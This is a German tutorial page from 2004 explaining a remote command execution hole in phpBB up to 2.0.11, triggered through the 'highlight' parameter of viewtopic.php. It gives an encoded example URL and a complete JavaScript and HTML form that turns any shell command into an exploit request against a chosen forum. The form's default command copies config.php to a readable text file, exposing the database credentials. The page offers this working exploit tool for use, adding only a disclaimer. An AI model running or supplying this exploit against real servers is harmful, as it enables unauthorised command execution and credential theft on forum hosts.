Tutorials Infos - Anleitungen - Hilfe - Dreamcodes
 

Phpbb 2.xx Hack

Beim phpBB bis zur Version phpBB 2.0.11 kann man über einen Bug in der viewtopic.php einen beliebigen Code ausführen.

Beschreibung:

Wenn man bei der viewtopic.php den String "highlight" mitsendet und ihn entsprechent codiert kann man zum Beispiel auf einem Windows-Server (was zum Glück nicht so oft) jeden Dos Befehl ausführen lassen den man will. Das gleiche gilt natürlich auch für Linux.

Hier ein Beispiel: viewtopic.php?t=1&highlight=%2527%252esystem(chr(104)%252echr(101)%252echr(108)%252echr(112))%252e%2527

Der Codierte String wird von der viewtopic "entschlüsselt" und verarbeitet. Dieses Beispiel sendet den harmlosen Befehl "help".

Um den String zu codieren gibt es dieses kleine Skript  :
<script language="JavaScript">
<!--
function start()
{
var command = document.form.command.value;
var split = command.split("");

var array = new Array();

for (var a=0; a<command.length; a++){
if(a==command.length-1) {
var crypt = "chr("+split[a].charCodeAt()+")";
}
else {
var crypt = "chr("+split[a].charCodeAt()+")%252e";
}
array.push(crypt);
}

document.form.action = document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value+"&highlight=%2527%252esystem("+array.join("")+")%252e%2527";
}

function check()
{
var url=document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value;

window.open(url);
}
//-->
</script>
<noscript></noscript>

<form method="post" name="form" onSubmit="return start()">
<table width="98%" cellspacing="1" cellpadding="4" border="0" align="center" class="forumline">
<tr>
<th class="thHead" colspan="2">Hack 4 phpBB 2.0.11</th>
</tr>
<tr>
<td class="row2" colspan="2"><span class="gensmall">Items marked with a * are required unless stated otherwise</span></td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">URL: *</span></td>
<td class="row2">
<input type="text" name="url" size="50" value="http://www.example.com/phpBB2" /> <a href="javascript:check()">check</a>
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Threadid: *</span></td>
<td class="row2">
<input type="text" name="threadid" size="50" value="1" />
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Command: *</span></td>
<td class="row2">
<input type="text" name="command" size="50" value="copy config.php config.txt" />
</td>
</tr>
<tr>
<td class="catBottom" colspan="2" align="center">
<input type="submit" name="submit" value="Submit" class="mainoption" />
&nbsp;&nbsp;
<input type="reset" value="Reset" class="liteoption" />
</td>
</tr>
<tr>
</tr>
</table></form>

Wer den Text nutzt, ist für die Folgen selbst verantwortlich.

 
ID: 580
eingestellt am: 30.12.2004
Autor: Puwu
Status zum lesen: Gast
gelesen: 6124
Webseite: www.dreamcodes.com
[Drucken]